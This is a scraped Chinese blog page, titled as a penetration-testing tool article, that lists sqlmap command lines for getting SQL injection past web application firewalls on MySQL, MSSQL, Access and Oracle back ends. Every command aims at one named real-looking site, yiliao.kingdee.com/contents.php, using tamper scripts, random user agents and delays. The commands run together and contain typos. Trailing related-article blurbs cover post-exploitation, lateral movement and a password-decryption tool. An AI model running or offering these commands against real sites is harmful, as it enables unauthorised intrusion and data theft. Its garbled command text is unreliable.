mysql绕过

sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.pysqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.pysqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

MSSQL绕过

sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.pysqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --hpp --tamper=space2comment.py,randomcase.pysqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --time-sec=120  --tamper=space2mssqlblank.py,securesphere.pysqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --tamper=unionalltounion.py,base64encode.p

access绕过

sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent  --tamper=appendnullbyte.py,space2plus.pysqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent --hpp  --tamper=chardoubleencode.py

Oracle绕过

sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.pysqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0” --hpp --tamper=charunicodeencode.py,chardoubleencode.py

参考文档

sqlmap中文文档

谢公子的博客

sqlmap性能优化

参数说明

这篇关于渗透测试工具篇——sqlmap的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/909446

相关文章

SQL注入漏洞扫描之sqlmap详解

《SQL注入漏洞扫描之sqlmap详解》SQLMap是一款自动执行SQL注入的审计工具,支持多种SQL注入技术,包括布尔型盲注、时间型盲注、报错型注入、联合查询注入和堆叠查询注入... 目录what支持类型how---less-1为例1.检测网站是否存在sql注入漏洞的注入点2.列举可用数据库3.列举数据库

性能测试工具 wrk,ab,locust,Jmeter 压测结果比较

前言 在开发服务端软件时,经常需要进行性能测试,一般我采用手写性能测试代码的方式进行测试,那有什么现成的好的性能测试工具吗? 性能测试工具 wrk,ab,locust,Jmeter 压测结果比较 详见: 性能测试工具 wrk,ab,locust,Jmeter 压测结果比较 Jmeter性能测试 入门

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

javaweb-day01-2(Junit测试工具用法)

JUnit 注释是给人看的,注解是给程序和编译器看的。 写好一个没有main函数的实体Person类,并且不想在main函数中来测试这个类中的方法: 我们一般使用JUnit测试: 建一个Junit.test包在这个包下建一个Junit test case,命名为PersonTest.java在Junit的测试用例PersonTest.java类中,建 testRun()、t

内网渗透—横向移动非约束委派约束委派

前言 今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。 实验环境 Web:192.168.145.137,192.168.22.28DC:192.168.22.30 非约束委派 原理 原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TG

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

Wycheproof:一款针对加密代码库的安全强度测试工具

关于Wycheproof Wycheproof是一款功能强大的加密代码库安全强度检测工具,广大研究人员可以使用Wycheproof来测试加密库的安全健壮度。 工具背景 在密码学中,微小的错误往往会带来灾难性的后果。我们发现,许多加密库频繁陷入这些实施陷阱,且问题常常持续很长时间。然而,获得可靠的实施指南非常困难,因为安全地实现密码学需要深入理解几十年的学术研究。我们意识到,软件

【渗透测试专栏】1.2认证和授权类-越权访问(水平/垂直越权)

该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 靶机环境请看专栏前言专栏前言-WooYun漏洞库环境搭建-CSDN博客 目录 该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 一、漏洞描述 1、水平越权 2、垂直越权 二、漏洞级别 三、漏洞检测方法 漏洞修复 一、漏洞描述 偏业务漏洞 1、水平越权 水平越权指的是在同一权限级别下,用户可以访问其他用户的资源或

渗透中的文件上传与下载

有时候拿下一台机器的控制权,需要在这台主机上传一些东西;有时候也会碰到不能直接上传只能通过命令行执行的shell,这就需要将shell下载下来。 目录 利用powershell进行文件上传下载 利用bitsadmin命令进行文件下载 利用certutil命令上传下载文件 利用wget命令上传下载文件 利用powershell进行文件上传下载 # 下载脚本并在内存中执行pow

【网络安全 | 渗透工具】Cencys+Shodan使用教程

原创文章,不得转载。 文章目录 Cencys准备语法全文搜索字段和值搜索通配符搜索布尔逻辑搜索嵌套搜索时间相关搜索范围搜索双引号 (")转义序列和保留字符 Censys 搜索语言中的主机查询查看主机搜索结果Censys 搜索语言中的证书查询查看证书搜索结果生成报告其余 Shodan准备使用语法查看设备详情 Cencys Censys 是一个强大的互联网搜索引擎和数据平台